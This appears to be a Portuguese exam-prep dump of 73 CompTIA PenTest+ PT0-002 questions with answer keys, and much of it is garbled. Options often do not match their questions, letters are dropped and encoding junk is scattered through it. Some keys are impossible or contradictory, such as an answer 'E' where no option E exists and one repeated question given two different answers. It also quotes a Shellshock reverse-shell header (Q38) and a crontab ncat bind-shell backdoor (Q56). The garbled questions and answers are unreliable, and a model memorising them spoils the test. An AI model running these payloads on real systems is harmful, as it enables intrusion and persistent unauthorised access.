NÃO QUER PERDER NADA?

Dicas para passar no exame de certificação

Últimas notícias sobre exames e informações sobre descontos

Curadoria e atualizada por nossos especialistas

Sim, me envie o boletim informativo

Últimas perguntas do exame CompTIA PenTest+ PT0-002 para uma preparação eficaz

A nossa extensa coleção de perguntas e respostas de exame, perguntas de teste cuidadosamente elaboradas e recursos de exame valiosos estão aqui para apoiar a sua jornada. Prepare-se com confiança utilizando os nossos materiais de estudo abrangentes, concebidos para cobrir todos os principais tópicos testados no exame. Desde metodologias de testes de penetração até à avaliação e gestão de vulnerabilidades, os nossos recursos foram concebidos para melhorar a sua compreensão e aumentar a sua preparação para o exame. A prática leva à perfeição, e os nossos exames simulados são a ferramenta perfeita para avaliar os seus conhecimentos e simular o ambiente do exame. Identifique os seus pontos fortes e fracos, aperfeiçoe as suas competências e aborde o dia do exame com confiança. Com a nossa orientação especializada e materiais de estudo de alto nível, você estará bem equipado para passar no exame CompTIA PenTest+ PT0-002 e levar sua carreira de segurança cibernética a novos patamares. Comece a se preparar hoje para uma experiência de exame bem-sucedida!
Faça outros exames online

Pergunta #1
Um testador de penetração descobriu uma vulnerabilidade que fornece a capacidade de fazer upload para um caminho através da descoberta transversal. Alguns dos ficheiros que foram descobertos através desta vulnerabilidade são:Qual dos seguintes é o MELHOR método para ajudar um atacante a obter acesso interno à máquina afetada?
A. Se os dados sensíveis do cliente estão acessíveis ao público
B. Se a ligação entre a nuvem e o cliente é segura
C. Se os empregados do cliente têm formação adequada para utilizar a plataforma
D. Se as aplicações na nuvem foram desenvolvidas utilizando um SDLC seguro
Ver resposta
Resposta correta: C
Pergunta #2
Uma empresa de software contratou um consultor de segurança para avaliar a segurança das práticas de desenvolvimento de software da empresa. O consultor opta por iniciar o reconhecimento realizando fuzzing num binário de software. Qual das seguintes vulnerabilidades é mais provável que o consultor de segurança identifique?
A. Esquemas de autenticação fracos
B. Credenciais armazenadas em cadeias de caracteres
C. Transbordamentos de memória intermédia
D. Gestão de recursos não optimizada
Ver resposta
Resposta correta: C
Pergunta #3
Qual dos seguintes tipos de informação seria MAIS provavelmente incluído num relatório de avaliação da segurança da aplicação dirigido aos programadores? (Escolha dois.)
A. Hidra
B. John, o Estripador
C. aim e Abel
D. Medusa
Ver resposta
Resposta correta: BC
Pergunta #4
Foi dada uma tarefa a um testador de penetração para atacar uma série de alvos no intervalo 192.168.1.0/24, accionando o menor número possível de alarmes e contramedidas. Qual das seguintes sintaxes de scan do Nmap seria a MELHOR para atingir este objetivo?
A. map ג€"sT ג€"vvv ג€"O 192
B. map ג€ sV 192
C. map ג€"sA ג€"v ג€"O 192
D. map ג€"sS ג€"O 192
Ver resposta
Resposta correta: D
Pergunta #5
Um técnico de testes de penetração está a limpar e a cobrir os rastos na conclusão de um teste de penetração. Qual dos seguintes itens o testador deve certificar-se de remover do sistema? (Escolha dois.)
A. Conchas desovadas
B. Contas de utilizador criadas
C. Registos do servidor
D. Contas de administrador
E. Reiniciar o sistema
F. Cache ARP
Ver resposta
Resposta correta: BC
Pergunta #6
Uma empresa de serviços de correio contratou um especialista em testes de penetração para realizar uma enumeração de todas as contas de utilizador num servidor SMTP para identificar se as contas de membros anteriores da equipa ainda estão activas. Qual dos seguintes comandos deve ser utilizado para atingir o objetivo?
A. RFY e EXPN
B. RFY e TURN
C. XPN e TURN
D. CPT TO e VRFY
Ver resposta
Resposta correta: A
Pergunta #7
Um técnico de testes de penetração descarregou um ficheiro de aplicação Java de um servidor Web comprometido e identifica a forma de o invocar observando o seguinte registo: Qual das seguintes é a ordem de passos que o técnico de testes de penetração tem de seguir para validar se a aplicação Java utiliza encriptação através de sockets?
A. Execute uma análise de vulnerabilidades da aplicação e, em seguida, identifique as portas TCP utilizadas pela aplicação
B. Execute a aplicação ligada a um depurador e, em seguida, reveja o registo da aplicação
C. Desmontar o código binário e depois identificar os pontos de rutura
D. Inicie uma captura de pacotes com o Wireshark e, em seguida, execute a aplicação
Ver resposta
Resposta correta: D
Pergunta #8
Um testador de penetração concluiu uma avaliação, removeu todos os artefactos e contas criados durante o teste e apresentou os resultados ao cliente. Qual das seguintes situações acontece a seguir?
A. O técnico de testes de penetração efectua um novo teste
B. O testador de penetração elimina todos os scripts das máquinas clientes
C. O cliente aplica patches aos sistemas
D. O cliente limpa os registos do sistema gerados durante o teste
Ver resposta
Resposta correta: C
Pergunta #9
Qual das seguintes situações exigiria que um técnico de testes de penetração notificasse o contacto de emergência para o compromisso?
A. A equipa explora um servidor crítico dentro da organização
B. A equipa exfiltra PII ou dados de cartões de crédito da organização
C. A equipa perde o acesso à rede remotamente
D. A equipa descobre outro ator num sistema da rede
Ver resposta
Resposta correta: D
Pergunta #10
Um técnico de testes de penetração está a explicar a estrutura ATT&CK do MITRE ao consultor jurídico principal de uma empresa. Qual das seguintes opções o técnico de testes descreveria com maior probabilidade como um benefício da estrutura?
A. Compreender as tácticas de uma intrusão de segurança pode ajudar a interrompê-las
B. Os scripts que fazem parte da estrutura podem ser importados diretamente para as ferramentas SIEM
C. A metodologia pode ser utilizada para estimar melhor o custo de um incidente
D. A estrutura é estática e garante a estabilidade de um programa de segurança ao longo do tempo
Ver resposta
Resposta correta: A
Pergunta #11
Qual dos seguintes conceitos define o conjunto específico de passos e abordagens que são realizados durante um teste de penetração?
A. Detalhes do âmbito de aplicação
B. Conclusões
C. etodologia
D. Declaração de trabalho
Ver resposta
Resposta correta: C
Pergunta #12
Um técnico de testes de penetração encontrou o seguinte URL válido enquanto efectuava uma avaliação manual de uma aplicação Web: http://www.example.com/product.php?id=123987.Which das seguintes ferramentas automatizadas seria a melhor para utilizar a seguir para tentar identificar uma vulnerabilidade neste URL?
A. Mapa SQL
B. essus
C. ikto
D. irBuster
Ver resposta
Resposta correta: A
Pergunta #13
Um técnico de testes de penetração efectuou uma análise de vulnerabilidades a um servidor Web e identificou uma única vulnerabilidade grave. Qual das seguintes é a MELHOR forma de garantir que se trata de um verdadeiro positivo?
A. Utilizar outro scanner para comparar
B. fetuar um teste manual no servidor
C. Verificar os resultados no scanner
D. Procurar a vulnerabilidade em linha
Ver resposta
Resposta correta: B
Pergunta #14
DRAG DROP (Drag and Drop não é suportado)Durante um teste de penetração, você ganha acesso a um sistema com uma interface de usuário limitada. Esta máquina parece ter acesso a uma rede isolada que você gostaria de varrer.INSTRUÇÕESAnalise os segmentos de código para determinar quais seções são necessárias para completar um script de varredura de porta.Arraste os elementos apropriados para os locais corretos para completar o script.Se a qualquer momento você quiser trazer de volta o estado inicial da simulação, por favor clique no botão Re
A. Ver a secção Explicação para obter a resposta
Ver resposta
Resposta correta: A
Pergunta #15
Um testador de penetração está a testar uma nova versão de uma aplicação móvel num ambiente sandbox. Para intercetar e desencriptar o tráfego entre a aplicação e a API externa, o testador criou uma AC de raiz privada e emitiu um certificado a partir dela. Apesar de o testador ter instalado a CA de raiz na pedra de confiança do smartphone utilizado para os testes, a aplicação apresenta um erro que indica uma incompatibilidade de certificados e não se liga ao servidor. Qual das seguintes opções é a razão mais provável para
A. porta TCP 443 não está aberta na firewall
B. O servidor da API está a utilizar SSL em vez de TLS
C. O testador está a utilizar uma versão desactualizada da aplicação
D. A aplicação tem o certificado API fixado
Ver resposta
Resposta correta: D
Pergunta #16
Uma empresa de investigação privada está a solicitar um teste de penetração para determinar a probabilidade de os atacantes conseguirem obter acesso a dispositivos móveis e, em seguida, exfiltrar dados desses dispositivos. Qual das seguintes opções é um método de engenharia social que, se for bem sucedido, MAIS provavelmente permitirá atingir ambos os objectivos?
A. Enviar um SMS com um número de serviço falsificado, incluindo uma ligação para descarregar uma aplicação maliciosa
B. Explorar uma vulnerabilidade na MDM e criar uma nova conta e um novo perfil de dispositivo
C. Realizar vishing no help desk de TI para reunir uma lista de IMEIs de dispositivos aprovados para mascaramento
D. Infestar um sítio Web frequentemente utilizado pelos funcionários com malware direcionado para arquitecturas x86
Ver resposta
Resposta correta: A
Pergunta #17
Um profissional de segurança deseja testar um dispositivo IoT enviando um pacote inválido para um serviço proprietário que escuta na porta TCP 3011. Qual das seguintes opções permitiria que o profissional de segurança manipulasse fácil e programaticamente o comprimento do cabeçalho TCP e a soma de verificação usando números arbitrários e observasse como o serviço proprietário responde?
A. Nmap
B. cpdump
C. capy
D. ping3
Ver resposta
Resposta correta: C
Pergunta #18
Um testador de penetração estabeleceu uma posição de ataque on-path e deve agora criar especialmente uma resposta de consulta DNS para ser enviada de volta a um host de destino
A. ocat
B. cpdump
C. capy
D. avar
Ver resposta
Resposta correta: C
Pergunta #19
Qual das seguintes opções a equipa de caça de uma empresa estaria MAIS interessada em ver num relatório final?
A. Resumo executivo
B. TTPs de ataque
C. etodologia
D. Pormenores do âmbito de aplicação
Ver resposta
Resposta correta: B
Pergunta #20
Um técnico de testes de penetração que está a efetuar uma avaliação solicitada pela empresa gostaria de enviar tráfego para outro sistema utilizando a marcação dupla. Qual das seguintes técnicas seria a MELHOR para atingir este objetivo?
A. Clonagem RFID
B. Marcação RFID
C. Meta-marcação
D. Aninhamento de etiquetas
Ver resposta
Resposta correta: D
Pergunta #21
Um Diretor de Segurança da Informação pretende que um técnico de testes de penetração avalie o nível de sensibilização para a segurança dos funcionários da empresa. Qual das seguintes ferramentas pode ajudar o técnico de testes a atingir este objetivo?
A. Metasploit
B. Hidra
C. ET
D. PScan
Ver resposta
Resposta correta: C
Pergunta #22
Uma empresa contratou uma equipa de testes de penetração para analisar os sistemas ciber-físicos de uma fábrica. A equipa descobriu imediatamente que os sistemas de supervisão e os PLCs estão ambos ligados à intranet da empresa. Qual das seguintes suposições, se feitas pela equipa de testes de penetração, é MAIS provável que seja válida?
A. Os autómatos não actuam sobre comandos injectados através da rede
B. Os supervisores e controladores estão numa rede virtual separada por predefinição
C. Os controladores não validam a origem dos comandos
D. Os sistemas de supervisão detectarão uma injeção maliciosa de código/comandos
Ver resposta
Resposta correta: C
Pergunta #23
Um técnico de testes de penetração escreve o seguinte guião: Qual das seguintes acções o técnico de testes está a executar?
A. Pesquisa de vulnerabilidades de serviço
B. Tentar recuperar um shell de ligação perdido
C. onstruir uma shell inversa à escuta em portas especificadas
D. Verificação de uma rede em busca de portas abertas específicas
Ver resposta
Resposta correta: D
Pergunta #24
Um técnico de testes de penetração foi contratado para efetuar um teste de penetração física para obter acesso a uma sala segura no edifício de um cliente. O reconhecimento exterior identifica duas entradas, uma rede WiFi para convidados e várias câmaras de segurança ligadas à Internet. Qual das seguintes ferramentas ou técnicas seria a MELHOR para apoiar o reconhecimento adicional?
A. Condução de veículos
B. hodan
C. econ-ng
D. Aircrack-ng
Ver resposta
Resposta correta: B
Pergunta #25
Um scan do Nmap mostra portas abertas em servidores Web e bases de dados. Um técnico de testes de penetração decide executar o WPScan e o SQLmap para identificar vulnerabilidades e informações adicionais sobre esses sistemas
A. Descobrir potenciais actividades criminosas com base nas provas recolhidas
B. Identificar todas as vulnerabilidades no ambiente
C. imitar a invasividade com base no âmbito
D. Manter a confidencialidade dos resultados
Ver resposta
Resposta correta: B
Pergunta #26
Uma empresa contratou um técnico de testes de penetração para instalar e configurar um ponto de acesso não autorizado na rede. Qual das seguintes é a MELHOR ferramenta a utilizar para atingir este objetivo?
A. Wireshark
B. ircrack-ng
C. ismet
D. ifite
Ver resposta
Resposta correta: B
Pergunta #27
Um scan de rede do Nmap encontrou cinco portas abertas com serviços identificados. Qual das seguintes ferramentas um testador de penetração deve usar para determinar se existem quaisquer vulnerabilidades com explorações associadas nas portas abertas?
A. OpenVAS
B. rozer
C. Conjunto de arrotos
D. OWASP ZAP
Ver resposta
Resposta correta: A
Pergunta #28
Um técnico de testes de penetração obtém acesso a um sistema e estabelece persistência e, em seguida, executa os seguintes comandos: Qual das seguintes acções é mais provável que o técnico de testes esteja a executar?
A. Redirecionar o histórico do Bash para /dev/null
B. Fazer uma cópia do histórico de Bash do utilizador para posterior enumeração
C. Cobrir os rastos limpando o histórico do Bash
D. Criar ficheiros de engodo no sistema para confundir os responsáveis pela resposta a incidentes
Ver resposta
Resposta correta: C
Pergunta #29
Um técnico de testes de penetração escreve o seguinte script: Qual dos seguintes objectivos o técnico de testes está a tentar alcançar?
A. eterminar os anfitriões activos na rede
B. efinir o TTL dos pacotes de ping para fins furtivos
C. reencher a tabela ARP dos dispositivos ligados à rede
D. xaminar o sistema nas portas mais utilizadas
Ver resposta
Resposta correta: A
Pergunta #30
Um técnico de testes de penetração obtém acesso a um sistema e estabelece persistência e, em seguida, executa os seguintes comandos: Qual das seguintes acções é mais provável que o técnico de testes esteja a executar?
A. Redirecionar o histórico do Bash para /dev/null
B. Fazer uma cópia do histórico de Bash do utilizador para posterior enumeração
C. Cobrir os rastos limpando o histórico do Bash
D. Criar ficheiros de engodo no sistema para confundir os responsáveis pela resposta a incidentes
Ver resposta
Resposta correta: C
Pergunta #31
Um técnico de testes de penetração precisa de aceder a um edifício que é guardado por portões trancados, uma equipa de segurança e câmaras. Qual das seguintes é uma técnica que o testador pode utilizar para obter acesso à estrutura de TI sem ser detectado?
A. Abrir uma fechadura
B. Desativar as câmaras remotamente
C. Fazer-se passar por um entregador de encomendas
D. Enviar uma mensagem de correio eletrónico de phishing
Ver resposta
Resposta correta: C
Pergunta #32
Depois de obter acesso a um sistema anterior, um testador de penetração executa um scan Nmap numa rede com os seguintes resultados:O testador executa então o seguinte comando a partir do sistema explorado anteriormente, que falha:Qual das seguintes opções explica a razão pela qual o comando falhou?
A. Verificação ativa
B. ing varredura
C. Inversão de protocolo
D. Análise de pacotes
Ver resposta
Resposta correta: A
Pergunta #33
Um testador de penetração está a avaliar uma rede sem fios. Apesar de monitorizar o canal e o SSID correctos, o verificador não consegue captar um aperto de mão entre os clientes e o AP. Qual dos seguintes ataques é o MAIS eficaz para permitir que o testador de penetração capture um handshake?
A. Reinstalação da chave
B. esautenticação
C. Gémeo mau
D. Repetição
Ver resposta
Resposta correta: B
Pergunta #34
Um testador de penetração recebeu um bloco de rede de 16 bits que foi incluído numa avaliação. Durante a avaliação, o testador apercebeu-se de que nenhum anfitrião estava ativo no bloco de IPs fornecido e comunicou o facto à empresa. A empresa então forneceu um bloco de IPs atualizado para o testador. Qual das seguintes opções seria o PRÓXIMO passo mais adequado?
A. Rescindir o contrato
B. Atualizar as ROE com as novas assinaturas
C. Examinar o bloco de 8 bits para mapear hosts perdidos adicionais
D. Continuar a avaliação
Ver resposta
Resposta correta: B
Pergunta #35
Um testador de penetração é capaz de capturar o tráfego de desafio-resposta NTLM entre um cliente e um servidor. Qual das seguintes opções pode ser feita com o pcap para obter acesso ao servidor?
A. Efetuar uma escalada vertical de privilégios
B. eproduzir o tráfego capturado para o servidor para recriar a sessão
C. Utilizar o John the Ripper para decifrar a palavra-passe
D. Utilizar um ataque pass-the-hash
Ver resposta
Resposta correta: D
Pergunta #36
Qual das seguintes opções descreve MELHOR o OWASP Top 10? (Escolha duas.)
A. Os riscos mais críticos das aplicações Web
B. Uma lista de todos os riscos das aplicações Web
C. Os riscos definidos por ordem de importância
D. Uma norma de segurança para aplicações Web
E.
F. Uma lista de verificação das vulnerabilidades do Apache
Ver resposta
Resposta correta: AC
Pergunta #37
Um consultor está a analisar a seguinte saída após relatórios de problemas de conetividade intermitente: Qual das seguintes opções é a MAIS provável de ser relatada pelo consultor?
A. Um dispositivo na rede tem um endereço IP na sub-rede errada
B. ma sessão multicast foi iniciada usando o grupo multicast errado
C. Um ataque de inundação ARP está a utilizar o endereço de difusão para efetuar DDoS
D. Um dispositivo na rede envenenou a cache ARP
Ver resposta
Resposta correta: D
Pergunta #38
Um testador de penetração descobre um servidor Web vulnerável em 10.10.1.1. O testador edita então um script Python que envia um exploit web e depara-se com o seguinte código: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}Qual das seguintes edições o testador deve fazer no script para determinar o contexto do usuário no qual o servidor está sendo executado?
A. xploit = {ג€User-Agentג€: ג€() { ignorado;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
B. xploit = {ג€User-Agentג€: ג€() { ignorado;};/bin/bash -i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
C. xploit = {ג€User-Agentג€: ג€() { ignorado;};/bin/sh -i ps -efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
D. xploit = {ג€User-Agentג€: ג€() { ignorado;};/bin/bash -i>& /dev/tcp/10
Ver resposta
Resposta correta: A
Pergunta #39
Um técnico de testes que está a efetuar um teste de penetração num sítio Web recebe o seguinte resultado:Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62Qual dos seguintes comandos pode ser utilizado para atacar ainda mais o sítio Web?
A. Obter acesso ao anfitrião alvo e implantar malware especialmente criado para este fim
B. Explorar o servidor DNS local e adicionar/atualizar os registos de zona com um registo A falsificado
C. Utilizar o utilitário Scapy para substituir os campos de resolução de nomes na resposta à consulta DNS
D. Ligações HTTP proxy do anfitrião de destino para o anfitrião falsificado
Ver resposta
Resposta correta: D
Pergunta #40
Um técnico de testes de penetração que está a fazer uma avaliação de segurança descobre que uma vulnerabilidade crítica está a ser ativamente explorada por cibercriminosos
A. Contactar o ponto de contacto principal
B. Tentar derrubar os atacantes
C. Chamar imediatamente as autoridades policiais
D. Recolher as provas adequadas e acrescentá-las ao relatório final
Ver resposta
Resposta correta: A
Pergunta #41
Qual das seguintes opções é MAIS importante incluir no relatório final de um teste estático de segurança de aplicações que foi escrito tendo como público-alvo uma equipa de programadores de aplicações?
A. Resumo executivo dos métodos de teste de penetração utilizados
B. Lista de materiais, incluindo fornecimentos, subcontratos e custos incorridos durante a avaliação
C. Avaliações quantitativas do impacto de um comprometimento bem sucedido de software
D. ontexto de código para instâncias de operações de typecasting inseguras
Ver resposta
Resposta correta: C
Pergunta #42
Um técnico de testes de penetração escreveu o seguinte script para ser utilizado num compromisso: Qual das seguintes acções será executada por este script?
A. Efetuar um novo teste de penetração
B. Corrigir as conclusões
C. Fornecer a lista de vulnerabilidades e exposições comuns
D. Alargar o âmbito do teste de penetração
Ver resposta
Resposta correta: A
Pergunta #43
Ao desenvolver um script de shell destinado a ser interpretado em Bash, o interpretador /bin/bash deve ser explicitamente especificado. Qual das seguintes combinações de caracteres deve ser usada na primeira linha do script para atingir este objetivo?
A. #
B. $
C. #
D. $
E. !
Ver resposta
Resposta correta: E
Pergunta #44
Um técnico de testes de penetração pretende encontrar informações ocultas em documentos disponíveis na Web num determinado domínio. Qual das seguintes opções deve ser utilizada pelo examinador de penetração?
A. etcraft
B. entralOps
C. Respondente
D. OCA
Ver resposta
Resposta correta: D
Pergunta #45
Um teste de penetração baseado na conformidade preocupa-se principalmente com
A. Obtenção de informações pessoais a partir da rede protegida
B. ontornar a proteção em dispositivos de extremidade
C. eterminar a eficácia de um conjunto específico de normas de segurança
D. bter informações específicas da rede protegida
Ver resposta
Resposta correta: C
Pergunta #46
Uma empresa utiliza um fornecedor de serviços de computação em nuvem com largura de banda de rede partilhada para alojar uma aplicação Web em servidores dedicados. O contacto da empresa com o fornecedor de serviços de computação em nuvem impede quaisquer actividades que possam interferir com os outros clientes do fornecedor de serviços de computação em nuvem. Ao contratar uma empresa de testes de penetração para testar a aplicação, qual das seguintes situações a empresa deve evitar?
A. Pesquisa dos URLs da aplicação Web à procura de vulnerabilidades
B. Impressão digital de todos os endereços IP dos servidores da aplicação
C. Força bruta sobre as palavras-passe da aplicação
D. Envio de muitos pedidos Web por segundo para testar a proteção DDoS
Ver resposta
Resposta correta: D
Pergunta #47
Um testador de penetração executou um scanner simples baseado em Python. A seguir, um trecho do código:Qual das seguintes opções descreve MELHOR por que esse script acionou um alerta de `probable port scan` no IDS da organização?
A. ock
B. range(1, 1025) na linha 1 preencheu a lista portList por ordem numérica
C. linha 6 utiliza socket
D. variável remoteSvr não foi nem tipada nem inicializada
Ver resposta
Resposta correta: B
Pergunta #48
Qual dos seguintes documentos deve ser assinado entre o técnico de testes de penetração e o cliente para regular a forma como as informações fornecidas são geridas antes, durante e após o compromisso?
A. SA
B. DA
C. OW
D. OE
Ver resposta
Resposta correta: B
Pergunta #49
Um testador de penetração executa o comando unshadow numa máquina. Qual das seguintes ferramentas o testador utilizará mais provavelmente a seguir?
A. John, o Estripador
B. Hidra
C. imikatz
D. Caim e Abel
Ver resposta
Resposta correta: A
Pergunta #50
Um testador de penetração está a realizar um teste de penetração. O testador obtém uma shell de nível de raiz num servidor Linux e descobre os seguintes dados num ficheiro chamado password.txt no diretório /home/svsacct:U3VQZXIkM2NyZXQhCg==Qual dos seguintes comandos deve o testador utilizar para descodificar o conteúdo do ficheiro?
A. cho U3VQZXIkM2NyZXQhCg== | base64 ג€"d
B. ar zxvf password
C. ydra ג€"l svsacct ג€"p U3VQZXIkM2NyZXQhCg== ssh://192
D. ohn --wordlist /usr/share/seclists/rockyou
Ver resposta
Resposta correta: A
Pergunta #51
Durante um trabalho, um técnico de testes de penetração encontrou a seguinte lista de cadeias de caracteres dentro de um ficheiro: Qual das seguintes é a MELHOR técnica para determinar o texto simples conhecido das cadeias de caracteres?
A. Ataque de dicionário
B. Ataque da tabela Rainbow
C. Ataque de força bruta
D. Ataque de enchimento de credenciais
Ver resposta
Resposta correta: B
Pergunta #52
Um técnico de testes de penetração está a preparar-se para realizar actividades para um cliente que requerem uma perturbação mínima das operações da empresa (Escolha duas.)
A. map -P0 -T0 -sS 192
B. map -sA -sV --host-timeout 60 192
C. map -f --badsum 192
D. map -A -n 192
Ver resposta
Resposta correta: AE
Pergunta #53
Uma empresa está preocupada com o facto de o seu fornecedor de serviços na nuvem não estar a proteger adequadamente as VMs que alojam o seu desenvolvimento de software. As VMs estão alojadas num centro de dados, com outras empresas a partilhar recursos físicos. Qual dos seguintes tipos de ataque é MAIS preocupante para a empresa?
A. Inundação de dados
B. Sessão de equitação
C. Ciberespeculação
D. Canal lateral
Ver resposta
Resposta correta: D
Pergunta #54
Um técnico de testes de penetração está a examinar uma rede de classe C para identificar rapidamente sistemas activos. Qual dos seguintes comandos deve ser usado pelo testador de penetração?
A. map -sn 192
B. map -sn 192
C. map -sn 192
D. map -sN 192
Ver resposta
Resposta correta: B
Pergunta #55
Qual das alternativas a seguir descreve a razão pela qual um testador de penetração executaria o comando sdelete mimikatz. * em um servidor Windows que o testador comprometeu?
A. Para remover entradas de registo de quebra de hash
B. Para remover a conta Mimikatz criada pelo testador
C. Para remover ferramentas do servidor
D. Para remover uma shell inversa do sistema
Ver resposta
Resposta correta: C
Pergunta #56
Um técnico de testes de penetração conseguiu obter acesso com êxito a uma estação de trabalho Windows no portátil de um cliente móvel. Qual das seguintes opções pode ser utilizada para garantir que o técnico de testes consegue manter o acesso ao sistema?
A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate
B. wmic startup get caption,command
C. crontab -l; echo ?€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash?€) | crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 user
Ver resposta
Resposta correta: C
Pergunta #57
Qual das seguintes opções fornece um conjunto de exploração com módulos de carga útil que cobrem a mais ampla gama de tipos de sistemas alvo?
A. Nessus
B. Metasploit
C. Conjunto de arrotos
D. thercap
Ver resposta
Resposta correta: B
Pergunta #58
Uma empresa utiliza um fornecedor de serviços de computação em nuvem com largura de banda de rede partilhada para alojar uma aplicação Web em servidores dedicados. O contacto da empresa com o fornecedor de serviços de computação em nuvem impede quaisquer actividades que possam interferir com os outros clientes do fornecedor de serviços de computação em nuvem. Ao contratar uma empresa de testes de penetração para testar a aplicação, qual das seguintes situações a empresa deve evitar?
A. Rastrear os URLs da aplicação web à procura de vulnerabilidades
B. Impressão digital de todos os endereços IP dos servidores da aplicação
C. Forçar a força bruta das palavras-passe da aplicação
D. Envio de muitos pedidos Web por segundo para testar a proteção DDoS
Ver resposta
Resposta correta: D
Pergunta #59
Qual das seguintes opções fornece uma matriz de tácticas e técnicas comuns utilizadas pelos atacantes, juntamente com as atenuações recomendadas?
A. IST SP 800-53
B. WASP Top 10
C. Quadro MITRE ATT&CK
D. Orientações técnicas PTES
Ver resposta
Resposta correta: C
Pergunta #60
Um testador de penetração está a analisar os seguintes resultados de reconhecimento de DNS para comptia.org a partir de dig:...;; ANSWER SECTIONcomptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org. 3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX novo.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org.Qual dos seguintes problemas potenciais o testador de penetração pode identificar com base nesse resultado?
A. Pelo menos um dos registos está fora do âmbito
B. Existe um registo MX duplicado
C. O registo NS não se encontra no domínio adequado
D. Os registos SOA fora do domínio comptia
Ver resposta
Resposta correta: A
Pergunta #61
Qual das seguintes opções deve ser a PRIMEIRA a ser considerada por um técnico de testes de penetração ao realizar um teste de penetração num ambiente de nuvem?
A. Se o fornecedor de serviços de computação em nuvem permite que o testador de penetração teste o ambiente
B. Se os serviços de nuvem específicos estão a ser utilizados pela aplicação
C. A localização geográfica onde os serviços de nuvem estão a ser executados
D. Se o país onde o serviço de computação em nuvem está baseado tem alguma legislação que o impeça
Ver resposta
Resposta correta: A
Pergunta #62
Um testador de penetração executou uma varredura do Nmap em um dispositivo de rede voltado para a Internet com a opção -F e encontrou algumas portas abertas. Para enumerar ainda mais, o testador executou outra varredura usando o seguinte comando: nmap -O -A -sS -p- 100.100.100.50O Nmap retornou que todas as 65.535 portas foram filtradasQual das seguintes situações é mais provável que tenha ocorrido na segunda varredura?
A. Uma firewall ou IPS bloqueou a verificação
B. O testador de penetração utilizou sinalizadores não suportados
C. O dispositivo de rede periférica foi desligado
D. O scan devolveu respostas de eco ICMP
Ver resposta
Resposta correta: A
Pergunta #63
Qual das seguintes opções deve ser a PRIMEIRA a ser considerada por um técnico de testes de penetração ao realizar um teste de penetração num ambiente de nuvem?
A. Se o fornecedor de serviços de computação em nuvem permite que o testador de penetração teste o ambiente
B. Se os serviços de nuvem específicos estão a ser utilizados pela aplicação
C. A localização geográfica onde os serviços de nuvem estão a funcionar
D. Se o país onde o serviço de computação em nuvem está sediado tem alguma legislação que o impeça
Ver resposta
Resposta correta: C
Pergunta #64
Um avaliador deseja executar uma varredura do Nmap da forma mais silenciosa possível. Qual dos seguintes comandos dará a MENOR chance de deteção?
A. Procurar portas abertas
B. Ouvir uma concha invertida
C. Tentativa de inundar portas abertas
D. Criar um túnel encriptado
Ver resposta
Resposta correta: C
Pergunta #65
Um testador de penetração recebeu um ficheiro .pcap para procurar credenciais a utilizar num compromisso. Qual das seguintes ferramentas deve o testador utilizar para abrir e ler o ficheiro .pcap?
A. Nmap
B. Wireshark
C. Metasploit
D. Netcat
Ver resposta
Resposta correta: B
Pergunta #66
Um técnico de testes de penetração efectua uma análise a um servidor e obtém o seguinte resultado: Qual das seguintes sequências de comandos deve o técnico de testes de penetração tentar SEGUINTE?
A. tp 192
B. mbclient \\\\\\\\WEB3\\\\IPC$ -I 192
C. crack -u Administrador -P 15worst_passwords
D. url -X TRACE https://192
Ver resposta
Resposta correta: A
Pergunta #67
Um técnico de testes de penetração foi capaz de recolher hashes MD5 de um servidor e decifrar os hashes facilmente com tabelas arco-íris. Qual das seguintes opções deve ser incluída como recomendação no relatório de correção?
A. Requisitos algorítmicos mais rigorosos
B. Controlos de acesso no servidor
C. Encriptação das palavras-passe dos utilizadores
D. Um programa de gestão de patches
Ver resposta
Resposta correta: A
Pergunta #68
Um técnico de testes de penetração está a avaliar o perímetro da rede de uma empresa. O testador recebeu informações limitadas sobre controlos defensivos ou contramedidas, e existe um conhecimento interno limitado dos testes. Qual das seguintes opções deve ser o PRIMEIRO passo para planear as actividades de reconhecimento?
A. Lançar uma verificação externa dos blocos de rede
B. Verificar os registos WHOIS e netblock da empresa
C. Utilizar pesquisas de DNS e dig para determinar os anfitriões externos
D. Realizar uma varredura de ping nos blocos de rede da empresa
Ver resposta
Resposta correta: B
Pergunta #69
Durante um teste de penetração, um testador consegue alterar os valores no URL de example.com/login.php?id=5 para example.com/login.php?id=10 e obter acesso a uma aplicação Web. Qual das seguintes vulnerabilidades foi explorada pelo testador de penetração?
A. Injeção de comandos
B. Autenticação quebrada
C. Referência direta ao objeto
D. Scripting entre sítios
Ver resposta
Resposta correta: B
Pergunta #70
Um técnico de testes de penetração efectua um scan do Nmap a um alvo e recebe os seguintes resultados: Qual das seguintes opções deve o técnico de testes utilizar para redirecionar as ferramentas de scan utilizando a porta TCP 1080 no alvo?
A. Nessus
B. Cadeias de proxy
C. WASP ZAP
D. Império
Ver resposta
Resposta correta: B
Pergunta #71
Qual das seguintes ferramentas seria MAIS útil na recolha de informações sobre fornecedores e outras informações relevantes para a segurança de dispositivos IoT para apoiar o reconhecimento passivo?
A. Shodan
B. Nmap
C. WebScarab-NG
D. Nessus
Ver resposta
Resposta correta: B
Pergunta #72
Um engenheiro de segurança identificou um novo servidor na rede e pretende analisar o anfitrião para determinar se está a executar uma versão aprovada do Linux e uma versão corrigida do Apache. Qual dos seguintes comandos realizará essa tarefa?
A. map ג€"f ג€"sV ג€"p80 192
B. map ג€"sS ג€"sL ג€"p80 192
C. map ג€"A ג€"T4 ג€"p80 192
D. map ג€"O ג€"v ג€"p80 192
Ver resposta
Resposta correta: C
Pergunta #73
Um técnico de testes de penetração obteve os seguintes resultados depois de analisar um servidor Web utilizando o utilitário dirb: Qual dos seguintes elementos é MAIS suscetível de conter informações úteis para o técnico de testes de penetração?
A. index
